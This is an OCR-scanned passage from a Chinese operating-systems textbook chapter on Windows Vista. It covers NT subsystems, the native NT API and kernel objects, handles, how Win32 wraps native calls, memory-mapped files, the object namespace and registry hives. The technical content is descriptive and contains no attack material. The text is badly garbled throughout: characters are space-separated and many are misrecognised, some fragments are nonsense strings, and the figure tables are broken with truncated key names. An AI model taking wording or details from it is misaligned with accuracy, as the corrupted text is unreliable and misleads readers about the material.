最 早 的 NI 文 持 三 个 个 性 化 子 系统 : 0S/2、POSIX、Win32。OS/2 在 
Windows XP 中 已 经 不 使 用 了 。POSIX 也 同样 不 使 用 了 ， 但 是 客户 可 以 
得 到 一 个 叫做 Pnterix 的 改进 版 POSIX 的 子 系统 ， 它 是 微软 面向 UNIX 的 服 
务 (SFU) 的 一 部 分 ， 因 此 所 有 设备 都 支持 系统 中 原 有 的 POSIX。 尽 管 微 
软 支 持 其 他 的 API， 但 大 多 数 Windows 的 应 用 软件 都 是 用 Win32 写 的 。 


不 同 于 Win32，.NET 并 不 是 原来 NT 的 内 核 接 口上 的 正式 的 子 系 
统 。 相 反 ，.NET 是 建立 在 Win32 编 程 模型 之 上 的 。 这 样 就 可 以 使 .NET 与 
现 有 的 Win32 程 序 很 好 地 互通 ， 而 不 必 关 心 POSIX 和 OS/2 子 系统 。 
WinFX API 包 含 了 很 多 Win32 的 功能 ， 而 实际 上 WinFX 基 本 类 库 (Base 
Class Library) 中 大 多 数 的 功能 都 是 win32 API 的 简单 包装 器 。WinFX 的 
优点 是 有 丰富 的 对 象 类 型 文 持 、 简 单一 致 的 界面 、 使 用 .NET 公 共 语 言 运 
行 库 〈CLR) 和 垃圾 收集 器 。 











如 图 11-7 所 示 ，NT 子 系统 建立 了 由 个 部 分 : 子 系统 进程 、 程 序 库 、 


创建 进程 (CreateProcess) 钩子 、 内 核 支 持 。 一 个 子 系统 进程 只 是 一 个 
服务 。 它 唯一 特殊 的 性 质 就 是 通过 smss.exe 程 序 〈 一 个 由 NT 局 动 的 初始 
用 户 态 程序 ) 开始 ， 以 响应 来 自 Win32 的 CreateProcess 或 不 同 的 子 系统 
中 相应 的 API 的 请 求 。 


子 系统 运行 时 库 
(CreateProcess 钧 子 ) 


子 系统 内 核 支持 


本 地 程序 调用 (LPC) 


本 地 NT 系统 服务 
NTOS 执 行 体 





图 11-7 用 于 构建 NT 子 系 统 的 模块 


程序 库 同 时 实现 了 高 层 的 操作 系统 功能 和 特定 的 子 系统 进程 。 这 些 
高 层 的 操作 系统 功能 是 特定 于 子 系统 以 及 子 系统 所 包含 的 桩 程序 (stub 
routine) 的。 桩 程序 是 进行 不 同 的 使 用 子 系统 的 进程 间 通 信 有 的 。 对 子 系 
统 进程 的 调用 通常 是 利用 内 核 态 的 本 地 过 程 调用 LPC (Local Procedure 
Call) 所 提供 的 功能 。LPC 实 现 了 跨 进 程 的 进程 调用 。 





在 Win32 CreateProcess 中 的 钩子 函数 Chook) 通过 查看 二 进 制图 像 
来 检测 子 系统 中 每 个 程序 请 求 。 (如 果 它 没有 运行 ) 通 过 smss.exe 启 动 
子 系统 进程 csrss.exe。 然 后 子 系统 进程 开始 加 载 程 序 。 在 其 他 子 系统 中 
也 有 类 似 的 钩子 函数 (例如 POSIX 中 的 exec 系 统 调用 )。 


NT 内 核 有 很 多 一 般 用 途 的 设备 ， 可 以 用 来 编写 操作 系统 特定 的 子 
系统 。 但 是 为 了 准确 地 执行 每 一 个 子 系统 还 需要 加 入 一 些 特殊 的 代码 。 
例如 ， 本 地 NtCreateProcess 系 统 调用 通过 重复 使 用 进程 实现 POSIXF fork 
函数 调用 ， 内 核 提 供 一 个 Win32 特 殊 类 型 串 表 ( 叫 atoms)， 通 过 进程 有 效 


实现 只 读 字符 串 的 共有 至。 


子 系统 进程 是 本 地 端 NT 程 序 ， 其 使 用 NT 内 核 和 核心 服务 提供 的 使 
用 本 地 系统 调用 ， 例 如 smss.exe 和 lsass.exe( 本 地 安全 管理 ) 。 本 地 系统 
调用 包括 管理 虚拟 地 址 的 跨 进程 功能 (facility〉、 线 程 、 句 顶 和 为 了 运 
行 用 来 使 用 特定 子 系统 的 程序 而 创建 的 进程 中 的 异常 。 


11.2.1 内 部 NT 应 用 编程 接口 


像 所 有 的 其 他 操作 系统 一 样 ，Windows Vista 也 拥有 一 套 系统 调用 。 
它们 在 Windows Vista 的 NTOS 层 实施 ， 在 内 核 态 运行 。 微 软 没 有 公布 内 
部 系统 调用 的 细节 。 它 们 被 操作 系统 内 部 一 些 底层 程序 使 用 ， 这 些 底层 
程序 通常 是 以 操作 系统 的 一 部 分 〈 主 要 是 服务 和 子 系统 ) ， 或 者 是 内 核 


态 的 设备 驱动 程序 的 形式 交付 的 。 本 地 的 NT 系统 调用 在 版 本 的 升级 中 
并 没有 太 大 的 改变 ， 但 是 微软 并 没有 选择 公开 ， 而 Windows 的 应 用 程序 
都 是 基于 Win32 的 ， 因 此 Win32 API 在 不 同 Windows 操 作 系 统 中 是 通用 
的 ， 从 而 能 够 让 这 些 应 用 程序 在 基于 MS-DOS 和 NT Windows 的 系统 中 正 


大 多 数 内 部 的 NT 系统 调用 都 是 对 内 核 态 对 象 进行 操作 的 ， 包 括 文 
件 、 线 程 、 管 道 、 信 号 量 等 。 图 11-8 中 给 出 了 一 些 Windows Vista 中 NT 
所 支持 的 常见 内 核 态 对 象 。 以 后 ， 我 们 讨论 内 核对 象 管理 器 时 ， 会 讨论 
具体 对 象 类 型 细 市 的 。 











REHE, HEJME, HE PCO, 
IO 完成 队列 


MTF. Bete. SKA. REIN as 


程序 任务 、 进 程 、 线 程 、 节 、 标 签 
Win32 GUI 果 面 、 应 用 程序 回调 


图 11-8 内 核 态 对 象 类 型 的 普通 类 别 








有 时 使 用 术语 “对 象 ”来 指 代 操作 系统 所 控制 的 数据 结构 ， 这 样 就 会 
造成 困惑 ， 因 为 错误 理解 成 “面向 对 象 * 了 。 操 作 系 统 的 对 象 提 供 了 数据 
隐藏 和 抽象 ， 但 是 缺少 了 一 些 面向 对 象 体系 基本 的 性 质 ， 如 继承 和 多 态 
| 





在 本 地 NT API 调 用 中 存在 创建 新 的 内 核 态 对 象 或 操作 已 经 存在 的 对 
象 的 调用 。 每 次 创建 和 打开 对 象 的 调用 都 返回 一 个 结果 叫 句柄 
Chandle) 给 调用 者 〈caller) 。 句 柄 可 在 接 下 来 用 于 执行 对 象 的 操作 。 
句柄 是 特定 于 创建 它们 的 具体 的 进程 的 。 通 常 句 柄 不 可 以 直接 交 给 其 他 
进程 ， 也 不 能 用 于 同一 个 对 象 。 然 而 ， 在 某 些 情 况 下 通过 一 个 受 保护 的 
方法 有 可 能 把 一 个 句柄 复制 到 其 他 进程 的 句柄 表 中 进行 处 理 ， 人 允许 进程 
共享 访问 对 象 一 一 即使 对 象 在 名 字 空 间 无 法 访问 。 复 制 句柄 的 进程 必须 
有 来 源 和 目标 进程 的 句柄 。 











每 一 个 对 象 都 有 一 个 和 它 相关 的 安全 描述 信息 ， 详 细 指出 对 于 特定 
的 访问 请 求 ， 什 么 对 象 能 够 或 者 不 能 够 针对 一 个 特定 的 目标 进行 何 种 操 
作 。 当 句柄 在 进程 之 间 复 制 的 时 候 ， 可 汪 加 具体 的 被 复制 句柄 相关 的 访 
问 限制 。 从 而 一 个 进程 能 够 复制 一 个 可 读 写 的 句柄 ， 并 在 目标 进程 中 把 
它 改变 为 只 读 的 版 本 。 





并 不 是 所 有 系统 创建 的 数据 结构 部 是 对 象 ， 并 不 是 所 有 的 对 象 都 是 
内 核对 象 。 那 些 真 正 的 内 核 态 对 象 是 那些 需要 命名 、 保 护 或 以 东 种 方式 
共 至 的 对 象 。 通 常 ， 这 些 内 核 态 对 象 表 示 了 在 内 核 中 的 茶 种 编程 抽象 。 
一 个 内 核 态 的 对 象 有 一 个 系统 定义 类 型 ， 有 明确 界定 的 操作 ， 并 占用 
内 核 内 存 。 虽 然 用 户 态 的 程序 可 以 执行 操作 《通过 系统 调用 ) ， 但 是 不 
能 直接 得 到 数据 。 





图 11-9 为 一 些 本 地 API 的 示例 ， 通 过 特定 的 句柄 操作 内 核对 象 ， 如 


进程 、 线 程 、IPC 端 口 和 扇 区 《用 来 描述 可 以 映射 到 地 址 空间 的 内 存 对 
象 ) 。NtCreateProcess 返 回 一 个 创建 新 进程 对 象 的 句柄 ，SectionHandle 
代表 一 个 执行 实例 程序 。 当 遇 到 异常 时 控制 进程 《例如 异常 、 越 界 ) ， 
DebugPort Handle 用 来 在 出 现 异常 (例如 ， 除 零 或 者 内 存 访问 越界 ) 之 
后 把 进程 控制 权 交 给 调试 器 的 过 程 中 与 调试 器 通信 。 








‘NtCreateProcess(&ProcHandle, Access, SectionHandle, DebugPortHandle, ExceptPortHandle, ...) 
NtCreateThread(&ThreadHandle, ProcHandle, Access, ThreadContext, CreateSuspended, ...) 

| NtAllocateVirtualMemory(ProcHandle, Addr, Size, Type, Protection, ...) 
NtMapViewOfSection(SectHandle, ProcHandle, Addr, Size, Protection, ...) 
NtReadVirtualMemory(ProcHandle, Addr, Size, ...) 
NtWriteVirtualMemory(ProcHandle, Addr, Size, ...) 
NtCreateFile(&FileHandle, FileNameDescriptor, Access, ...) _ 
NtDuplicateObject(srcProcHandle, srcObjHandle, dstProcHandle, dstObjHandle, ...) 






































图 11-9 在 进程 之 间 使 用 句柄 来 管理 对 架 的 本 地 NT API 调 用 示例 


NtCreate 线 程 需要 ProcHandle， 因 为 ProcHandle 可 以 在 任意 一 个 含 
句柄 的 进程 中 (有 足够 的 访问 权限 ) 创建 线程 。 同 样 ， 
NtAllocateVirtualMemory, NtMapViewOfSection、NtReadVirtualMemory 
和 NtWriteVirtualMemory 可 使 进程 不 仅 在 自己 的 地 址 空间 操作 ， 也 可 以 
在 分 配 虚 拟 地 址 和 映射 段 ， 还 可 以 读 写 其 他 进程 的 虚拟 内 存 。 
NtCreateFile 是 一 个 内 部 API 调 用 ， 用 来 创建 或 打开 文件 。 
NtDuplicateObject， 可 以 在 不 同 的 进程 之 间 复 制 句 柄 的 API 调 用 。 





当然 不 是 只 有 Windows 有 内 核 态 对 象 。UNIX 系 统 也 同样 支持 内 核 
态 对 象 ， 例 如 文件 、 网 络 数据 包 、 管 道 、 设 备 、 进 程 、 共 享 内 存 的 IPC 


设备 、 消 息 端口 、 信 号 和 IO 设备 。 在 UNIX 中 有 各 种 各 样 的 方式 命名 和 
访问 对 象 ， 例 如 文件 描述 符 、 进 程 ID、System V IPC 对 象 的 整形 ID 和 设 
备 节 点 。 每 一 类 的 UNIX 对 象 的 实现 是 特定 于 其 类 别 的 。 文 件 和 socket 使 
用 不 同 的 设施 facility， 并 且 是 System V IPC 机 制 、 程 序 、 装 置 之 外 的 。 





Windows 中 的 内 核对 象 使 用 一 个 的 基于 NT 名 字 空 间 中 关于 对 象 的 句 
柄 和 命名 统一 设备 指 代 内 核对 象 ， 而 且 使 用 一 个 统一 的 集中 式 对 象 管理 
器 。 人 句柄 是 进程 特定 的 ， 但 正如 上 文 所 述 ， 可 以 在 被 妃 一 个 进程 使 用 。 
对 象 管 理 器 在 创建 对 象 时 可 以 给 对 象 命名 ， 可 以 通过 名 字 打 开 对 象 的 句 
柄 。 


对 象 管理 器 在 NT 名 字 空 间 中 使 用 统一 的 字符 编码 标准 《〈 宽 位 字 
fF) 命名 。 不 同 于 UNIX，NT 一 般 不 区 分 大 小 写 〈 它 保留 大 小 写 但 不 区 
) 。NT 名 字 空 间 是 一 个 分 层 树 形 结构 的 目录 ， 和 象征 联系 和 对 象 。 


> 


对 象 管理 器 提供 统一 的 管理 同步 、 安 全 和 对 象 生命 期 的 设备 。 对 于 
对 象 管理 器 提供 给 用 户 的 一 般 设 备 是 否 能 为 任何 特定 对 象 的 用 户 所 获 
得 ， 这 是 由 执行 体 部 件 来 决定 的 ， 它 们 都 提供 了 操纵 每 一 个 对 象 类 型 的 
内 部 API。 





这 不 仅 是 应 用 程序 使 用 对 象 管 理 圳 中 的 对 象 。 操 作 系统 本 身 也 创建 
和 使 用 对 象 一 一 而 且 非 常 多。 大 多 数 这 些 对 象 的 创建 是 为 了 让 系统 的 茶 
个 部 分 存储 相当 一 段 长 时 间 的 信息 或 者 将 一 些 数 据 结 构 传 递 给 其 他 的 部 


件 ， 但 这 部 受益 于 对 象 管 理 占 对 命名 和 生存 周期 的 支持 。 例 如 ， 当 一 个 
设备 被 友 现 ， 一 个 或 多 个 设备 创建 代表 该 设备 对 象 ， 并 在 理论 上 说 明 该 
设备 如 何 连接 到 系统 的 其 他 部 分 。 为 了 控制 设备 而 加 载 设备 的 驱动 程 

序 ， 创 建 驱动 程序 对 象 用 来 保存 属性 和 提供 驱动 程序 所 实现 的 函数 的 指 
针 ， 这 些 函 数 是 实现 对 VO 请 求 的 处 理 。 操 作 系 统 中 在 以 后 使 用 其 对 象 

时 会 涉及 这 个 驱动 。 驱 动 也 可 以 直接 通过 名 字 来 访问 ， 而 不 是 间接 的 通 
过 它 所 控制 的 设备 来 访问 的 (例如 ， 从 用 户 态 来 设置 控制 它 的 操作 的 参 

数 )。 











不 像 UNIX 把 名 字 空 间 的 根 放 在 了 文件 系统 中 ，NT 的 名 字 空 间 则 是 
保留 在 了 内 核 的 虚拟 内 存 中 。 这 意味 着 NT 在 每 次 系统 月 动 时 ， 都 得 重 
新 创建 最 上 层 的 名 字 空 间 。 内 核 虚拟 内 存 的 使 用 ， 使 得 NT 可 以 把 信息 
存储 在 名 字 空 间 里 ， 而 不 用 首先 局 动 文 件 系统 。 这 也 使 得 NT 更 加 容易 
地 为 系统 添加 新 类 型 的 内 核 态 的 对 象 ， 原 因 是 文件 系统 目 身 的 格式 不 需 
要 为 每 种 新 类 型 的 目标 文件 进行 改变 。 














一 个 命名 的 目标 文件 可 以 标记 为 永久 性 的 ， 这 意味 着 这 个 文件 会 一 
直 存 在 ， 即 使 在 没有 进程 的 句柄 指 癌 该 对 象 条 件 下 ， 除 非 它 被 删除 或 者 
系统 重新 局 动 。 这 些 对 象 甚 至 可 以 通过 提供 parse 例 程 来 扩展 NT 的 名 字 
空间 ， 这 种 例 程 方式 类 似 于 允许 对 象 具 有 UNIX 中 挂 载 点 的 功能 。 文 件 
系统 和 注册 表 使 用 这 个 工具 在 NT 的 名 字 空 间 上 挂 载 卷 和 储 业 。 访 问 到 
一 个 卷 的 设备 对 象 即 访问 了 原始 卷 Craw volume) ， 但 是 设备 对 象 也 可 





以 表明 一 个 卷 可 以 加 载 到 NT 名 字 空 间 中 去 。 卷 上 的 文件 可 以 通过 把 卷 
相关 文件 名 加 在 卷 所 对 应 的 设备 对 象 的 名 称 后 面 来 访问 。 


永久 性 名 字 也 用 来 描述 同步 的 对 象 或 者 共享 内 存 ， 因 此 它们 可 以 被 
进程 共享 ， 避 免 了 当 进 程 频繁 启动 和 停止 时 来 不 断 重 建 。 设 备 文 件 和 经 
常 使 用 的 驱动 程序 会 被 给 予 永 久 性 名 字 ， 并 且 给 予 特 殊 索 引 节 点 持久 属 
性 ， 这 些 索 引 市 点 保存 在 UNIX 的 /dev 目 录 下 。 














我 们 将 在 下 一 节 中 描 叙 纯 NT API 的 更 多 特征 ， 讨 论 Win32 API 在 NT 
系统 调用 的 封装 性 。 


11.2.2 ”Win32 应 用 编程 接口 


Win32 函 数 调 用 统称 为 Win32 API 接 口 。 这 些 接口 已 经 被 公布 并 且 
详细 地 写 在 了 文档 上 。 这 些 接口 在 调用 的 时 候 采 用 库 文件 链接 流程 : 
过 封装 来 完成 原始 NT 系统 调用 ， 有 些 时 候 也 会 在 用 户 态 下 工作 。 虽 然 
原始 API 没 有 公布 ， 但 是 这 些 API 的 功能 可 以 通过 公布 的 Win32 API 来 调 
用 实现 。 随 着 新 的 Windows 版 本 的 更 新 ， 更 多 的 API 函 数 相应 增加 ， 但 
是 原先 存在 的 API 调 用 确 很 少 改 变 ， 即 使 Windows 进 行 了 升级 。 





图 11-10 表 示 出 各 种 级 别 的 Win32 API 调 用 以 及 它们 封装 的 原始 API 
调用 。 最 有 趣 的 部 分 是 关于 图 上 令 人 乏味 的 映射 。 许 多 低级 别 的 Win32 
函数 有 相对 应 的 原始 NT 函数 ， 这 一 点 都 不 奇怪 ， 因 为 Win32 就 是 为 原始 
NT API 设 计 的 。 在 许多 例子 中 ，Win32 函 数 层 必须 利用 Win32 的 参数 传 
递 给 NT 内 核 函 数 。 例 如 ， 规 范 路 径 名 并 且 映 射 到 NT 内 核 路 径 ， 包 括 特 
殊 的 MS-DOS 设 备 〈 如 LPT:) 。 当 创建 进程 和 线程 时 ， 使 用 的 Win32 
API 函 数 必 须 通知 win32 子 系统 进程 csrss.exe， 告 知 它 有 新 的 进程 和 线程 
需要 它 来 监督 ， 就 像 我 们 在 11.4 节 里 描述 的 那样 。 


一 些 Win32 调 用 使 用 路 径 名 ， 然 而 相关 的 NT 内 核 调用 使 用 句柄 。 所 
以 这 些 封 装 流程 包括 打开 文件 ， 调 用 NT 内 核 ， 最 后 关闭 句柄 。 封 装 流 
程 同时 包括 把 Win32 API 从 ANSI 编 码 变 成 Unicode 编 码 。 在 图 11-10 的 


Win32 函 数 里 使 用 字符 串 作 参数 的 实际 上 是 两 套 API， 例 如 参数 
CreateProcessW 和 CreateProcessA。 当 这 些 参 数 要 传递 到 下 一 个 API 时 ， 
这 些 字 符 串 必须 翻译 成 Unicode 编 码 ， 因 为 NI 内 核 调 用 只 认识 Unicode。 


SANT APIA 


图 11-10 Win32 API 调 用 以 及 它们 所 包含 的 本 地 NT API 调 用 示例 








因为 已 经 存在 的 Win32 接 口 很 少 随 着 操作 系统 的 改变 而 改变 ， 所 以 
从 理论 上 说 能 在 前 一 个 版 本 系统 上 运行 的 程序 也 能 正常 地 在 新 版 本 的 系 
统 上 运行 。 可 在 实际 情况 中 ， 依 然 经 常 存在 新 系统 的 羔 容 性 问题 。 
Windows 太 复杂 了 以 至 于 有 些 表面 上 不 合 逻 辑 的 改动 会 导致 应 用 程序 运 
行 失败 。 应 用 程序 本 里 也 有 问题 ， 例 如 ， 它 们 也 经 常 做 细致 的 操作 系统 














版 本 检查 或 者 本 里 束 有 潜在 的 问题 只 不 过 是 在 新 系统 上 骏 露 出 来 了 人。 然 
而 ， 微 软 依旧 尽力 在 每 个 版 本 上 测试 不 同 的 兼容 性 问题 ， 并 且 力 图 提供 
特定 的 解决 办 法 。 


Windows 支 持 两 种 特殊 环境 ， 一 种 叫 WOW。WOW32 通 过 映射 16 位 
字符 串 到 32 位 ， 来 在 32 位 x86 系 统 用 16 位 Windows 3.x 应 用 程序 。 同 样 ， 
WOW64 人 允许 32 位 的 程序 在 x64 架 构 的 系统 上 运行 。 


Windows API 体 系 不 同 于 UNIX 体 系 。 对 于 后 者 来 说 ， 操 作 系 统 函 数 
很 简单 ， 只 有 很 少 的 参数 以 及 很 少 的 方法 来 执行 同样 的 操作 ， 从 而 可 以 
有 很 多 途径 来 完成 同样 的 操作 。Win32 提 供 了 非常 广泛 的 接口 和 参数 ， 
常常 能 通过 三 四 种 方法 来 做 同样 的 事情 ， 同 时 把 低级 别 和 高 级 别 的 函数 
温和 到 一 起 ， 例 如 CreateFile 和 CopyFile。 








这 意味 着 Win32 提 供 了 一 组 非 第 多 的 接口 ， 但 是 这 也 增加 了 复杂 
度 ， 原 因 是 在 同一 个 API 中 糟糕 的 系统 分 层 以 及 高 低级 别 函 数 的 混和 。 
为 了 学 习 操作 系统 ， 我 们 仅仅 关注 那些 低级 别 的 函数 封装 了 相关 的 NT 
内 核 的 API 的 Win32 API. 


Win32 有 创建 和 管理 进程 和 线程 的 调用 。Win32 也 有 许多 进程 内 部 
通信 的 调用 ， 例 如 创建 、 销 毁 、 互 斥 、 信 号 、 通 信 接 口 和 其 他 IPC 实 
体 。 








里 然 大 量 的 内 存 定理 系统 对 程序 员 来 说 是 看 不 见 的 ， 但 是 一 个 重要 





的 特征 是 可 见 的 : 即 一 个 进程 把 文件 映射 到 虚拟 内 存 的 一 块 区 域 上 。 这 
样 允 许 线程 可 以 使 用 指针 来 读 写 部 分 文件 ， 而 不 必 执 行 在 硬盘 和 内 存 之 
间 具 体 的 读 写 数据 操作 。 通 过 内 存 映 射 ， 内 存 系统 可 以 根据 需求 来 执行 

IO 操作 《要 求 分 页 ) 。 


Windows 处 理 内 存 映射 文件 使 用 三 种 完全 不 同 的 手段 。 第 一 种 ， 它 
提供 允许 进程 管理 它们 上 自己 虚拟 空间 的 接口 ， 包 括 预 留 地 址 范围 为 以 后 
用 。 第 二 种 ，Win32 文 持 一 种 称 作文 件 映 射 的 抽象 ， 这 用 来 代 答 可 定位 
的 实体 ， 如 文件 《文件 的 映射 在 NI 的 层次 中 称 作 section ) . WH, StF 
映射 是 使 用 文件 句柄 来 关联 文件 。 但 有 时 候 也 用 来 指向 分 页 系统 中 的 私 
有 页 面 。 











三 种 方法 是 把 文件 映射 的 视图 映射 到 一 个 进程 的 地 址 空间 。 
Win32 仪 仅 允许 为 当前 进程 创建 一 个 视图 ， 但 是 NT 潜在 的 手段 更 加 通 
用 ， 人 允许 为 任意 你 有 权限 句柄 的 进程 创建 视图 。 和 UNIX 中 的 mmap 相 
比 ， 要 区 分 开创 建文 件 映 射 和 把 文件 映射 到 地 址 空间 的 操作 。 








在 Windows 中 ， 文 件 映 射 的 内 核 态 实体 被 句柄 所 取代 。 就 像 许多 名 
柄 一 样 ， 文 件 映 射 能 够 被 复制 到 其 他 进程 中 去 。 这 些 进程 中 的 任意 一 个 
能 够 根据 需求 映射 文件 到 自己 的 地 址 空间 中 。 这 对 共享 进程 间 的 私有 内 
存 是 非常 有 用 的 ， 而 且 不 必 再 创建 文件 来 实现 。 在 NT 层 ， 文 件 的 映射 
(sections) 也 和 NT 名 字 空 间 保持 一 致 ， 能 够 通过 文件 名 来 访问 。 














对 许多 程序 来 说 ， 一 个 重要 的 领域 是 文件 WO 操作 。 在 Win32 基 本 视 
图 中 ， 一 个 文件 仅仅 是 一 组 有 顺序 的 字 节 流 。Win32 提 供 超过 60 种 调用 
来 创建 和 删除 文件 和 目录 、 打 开关 闭 文件 、 读 写 文 件 、 提 取 设 置 文件 属 
性 、 锁 定 字 节 流 范围 以 及 更 多 基础 操作 的 功能 ， 这 些 功能 基于 文件 系统 
的 组 织 以 及 文件 的 各 自 访问 权限 。 





还 有 更 高 级 的 处 理 文 件数 据 的 方法 。 除 了 主要 的 文件 流 ， 存 在 
NTFS 文 件 系 统 上 的 文件 可 以 拥有 人 额外 的 文件 流 。 文 件 〈 甚 至 包括 整个 
卷 ) 可 以 被 加 密 。 文 件 可 以 被 压缩 成 为 一 组 相对 稀 疏 的 字 市 流 ， 从 而 市 
省 磁盘 空间 。 不 同 硬 盘 的 文件 系统 的 卷 可 以 通过 使 用 不 同 级 别 的 RAID 
存储 而 组 织 起 来 。 修 改 文件 或 者 目录 可 以 通过 一 种 直接 通知 的 方式 来 实 
现 ， 或 者 通过 读 NTFS 为 每 个 卷 维护 的 日 志 来 实现 。 











每 个 文件 系统 的 卷 默认 挂 载 在 NT 的 名 字 空 间 里 ， 根 据 卷 的 名 字 来 
排列 ， 因 此 ， 一 个 文件 \foo\bar 可 以 命名 成 
\Device\HarddiskVolume\foo\bar。 对 于 NTFS 的 卷 来 说 ， 挂 载 点 (Windows 
称 作 再 分 解 点 ) 和 符号 链接 用 来 帮助 组 织 卷 。 





低级 别 的 Windows IO 模式 基本 上 是 异步 的 。 一 旦 一 个 IO 操作 开 
始 ， 系 统 调用 将 允许 线程 对 MO 操作 进行 初始 化 并 且 开 始 IO 操 作 。 
Windows 支 持 取消 操作 ， 以 及 一 系列 的 不 同 机 制 来 文 持 线程 和 IO 操作 完 
成 之 后 的 同步 。Windows 也 人 允许 程序 规定 在 文件 打开 时 IO 操作 必须 同 
步 ， 许 多 库 函 数 ， 例 如 C 库 和 许多 Win32 调 用 ， 也 规定 IO 的 同步 已 支持 





兼容 性 或 者 简化 编程 模型 。 在 这 些 情况 下 ， 执 行 体会 在 返回 到 用 户 态 前 
和 IO 操作 结束 时 进行 同步 。 


Win32 提 供 的 另 一 些 调用 是 安全 性 相关 的 。 每 个 线程 将 和 一 个 内 核 
对 象 进行 捆绑 ， 称 作 令 牌 (token) ， 这 个 令 牌 提 供 关于 该 线程 的 身份 
和 权限 相关 的 信息 。 每 个 目标 可 以 有 一 个 ACL《〈 访 问 权 限 控制 列表 ) ， 
这 个 列表 详细 描述 了 哪 种 用 户 有 权限 访问 并 且 对 其 进行 操作 。 这 种 方式 
通过 了 一 种 细 粒 度 的 安全 机 制 ， 可 以 指定 具体 哪些 用 户 可 以 或 者 禁止 访 
问 特定 的 对 象 。 这 种 安全 模式 是 可 以 扩展 的 ， 人 允许 应 用 程序 添加 新 的 安 
全 规则 ， 例 如 限制 访问 时 间 。 











Win32 的 名 字 空 间 不 同 于 前 面 描述 的 NT 内 核 名 字 空 间 。NT 内 核 空 
间 仅 仅 只 有 一 部 分 对 Win32 API 函 数 可 见 《〈 即 使 整个 NT 名 字 空 间 可 以 通 
过 Win32 使 用 特殊 字符 串 来 访问 ， 如 从”) 。 在 Win32 中 ， 文 件 访问 权限 
和 驱动 器 号 相关 。NT 目 录 \DosDevices 里 包含 了 对 一 个 从 驱动 器 号 到 实 
际 设备 对 象 的 数 个 符号 链接 。 例 如 ，\DosDevices\C: 是 指向 
\Device\HarddiskVolumel。 这 个 目录 同样 也 包含 了 其 他 Win32 设 备 的 链 
接 ， 如 COM1:、LPT1: 和 NUL:( 端 口号 和 打印 端口 ， 以 及 非常 重要 的 空 
设备 )。\DosDevices 是 一 个 真正 指向 ?? 的 链接 ， 这 样 有 利于 提高 效率 。 
另外 一 个 NT 文件 夹 ，\BaseNamedObjects 用 来 存储 各 种 各 样 的 内 核对 
象 ， 这 些 文件 可 以 通过 Win32 API 来 访问 。 这 些 对 象 包括 用 来 同步 的 对 
象 ， 如 信和 号、 共享 内 存 、 定 时 器 以 及 通信 端口 ，MS-DOS 和 设备 名 称 。 


对 于 底层 系统 接口 ， 我 们 额外 说 一 下 ，Win32 API 也 支持 许多 GUI 
操作 ， 包 括 系 统 所 有 图 形 接口 的 调用 。 有 对 窗口 的 创建 、 摧 毁 、 管 理 和 
使 用 的 调用 ， 以 及 文 持 沫 单 、 工 具 条 、 状 态 栏 、 滚 动 条 、 对 话 框 、 图 标 
和 许多 在 屏幕 上 显示 的 元 素 。Win32 还 提供 调用 来 画 几何 图 形 、 填 充 、 
使 用 调 色 板 、 处 理 文 字 以 及 在 屏幕 上 放置 图 标 等 。 也 支持 对 键盘 鼠标 和 
其 他 输入 设备 的 响应 ， 如 音频 、 打 印 等 其 他 输出 设备 。 








GUI 操作 直接 使 用 win32k.sys 驱 动 ， 这 个 驱动 使 用 特殊 的 函数 从 用 
户 态 去 访问 内 核 态 的 接口 。 因 为 这 些 调用 不 包含 NT 操作 系统 中 的 系统 
调用 ， 我 们 将 不 会 详细 讨论 。 


11.2.3 “Windows 注 册 表 


名 字 空 间 的 根 在 内 核 中 维护 。 存 储 设 备 ， 如 系统 的 卷 ， 附 属于 名 字 
空间 中 。 因 为 名 字 空 间 会 因为 系统 的 每 次 启动 重新 构建 ， 那 么 系统 怎么 
知道 系统 配置 的 细节 呢 ? 答案 就 是 Windows 会 挂 载 一 种 特殊 的 文件 系统 
(为 小 文件 做 了 优化 ) 到 名 字 空 间 。 这 个 文件 系统 称 作 注 册 表 
(registry) 。 注 册 表 被 组 织 成 了 不 同 的 卷 ， 称 作 储 梨 Chive) 。 每 个 储 
巢 保 存在 一 个 单独 文件 中 在 启动 卷 的 目录 
C:\Windows\system32\config\ F) 。 当 Windows 系 统 启动 时 ， 一 个 叫做 
SYSTEM 的 特殊 储 曲 被 装 入 了 内 存 ， 这 是 由 同样 的 装载 内 核 和 其 他 局 动 
文件 〈 例 如 位 于 启动 盘 的 张 动 程序 ) 的 程序 来 完成 。 


























Windows 在 系统 储 巢 里 面 保存 了 大 量 的 重要 信息 ， 包 括 驱 动 程序 去 
驱使 什么 设备 工作 ， 什 么 软件 进行 初始 化 ， 以 及 什么 变量 来 控制 操作 系 
统 的 操作 等 。 这 些 信息 甚至 被 局 动 程序 自己 用 来 决定 哪些 驱动 程序 是 用 
于 局 动 的 驱动 ， 哪 些 必须 立即 需要 启动 。 这 些 驱 动 包括 操作 系统 自身 来 
识别 文件 系统 和 磁盘 驱动 的 程序 。 














其 他 配置 储 昌 用 在 系统 局 动 后 ， 摘 述 系 统 安装 的 软件 的 信息 ， 特 别 
是 用 户 和 用 户 态 下 安装 在 系统 上 的 COM (Component Object-Model). 7S 
地 用 户 的 登录 信息 保存 在 SAM 〈 安 全 访问 管理 器 ) 中。 网 络 用 户 的 信息 








保存 在 lsass 服 务 中 ， 和 网 络 服务 器 文件 夹 一 起 ， 用 户 可 以 通过 上 述 两 种 
配置 拥有 一 个 访问 网 络 的 用 户 名 和 密码 。Windows Vista 的 储 巢 列表 在 图 


11-11 中 显示 。 






































rer 挂 载 名 称 使 用 
SYSTEM HKLM TEM OS 配置 信息 ， 供 内 核 使 用 
HARDWARE HKLM DWARE 记录 探测 到 的 设备 的 内 存储 梨 
BCD HKLM BCD* 启动 配置 数据 库 

| SAM HKLM 本 地 用 账户 信息 

| SECURITY | HKLMURITY lass 的 账号 和 其 他 信息 


























DEFAULT HKEY_USERS .DEFAULT | 新 用 户 的 默认 储 梨 
NTUSER.DAT HKEY_USERS <user id> 用 户 相 关 的 储 梨 ， 保 存在 home 目 录 
SOFTWARE HKLM TWARE COM 注 册 的 应 用 类 

















COMPONENTS | HKLM NENTS SYS 组 件 的 清单 和 依赖 








图 11-11 Windows Vista 中 的 注册 表 储 梨 。HKLM 是 


HKEY_LOCAL_MACHINE #4 44 5 











在 引入 注册 表 之 前 ，Windows 的 配置 信息 保存 在 大 量 的 .ini 文 件 里 ， 
分 散在 硬盘 的 各 个 地 方 。 注 册 表 则 把 这 些 文件 集中 存储 ， 使 得 这 些 文件 
可 以 在 系统 启动 的 过 程 中 引用 。 这 对 Windows 热 插 拔 功 能 是 很 重要 的 。 
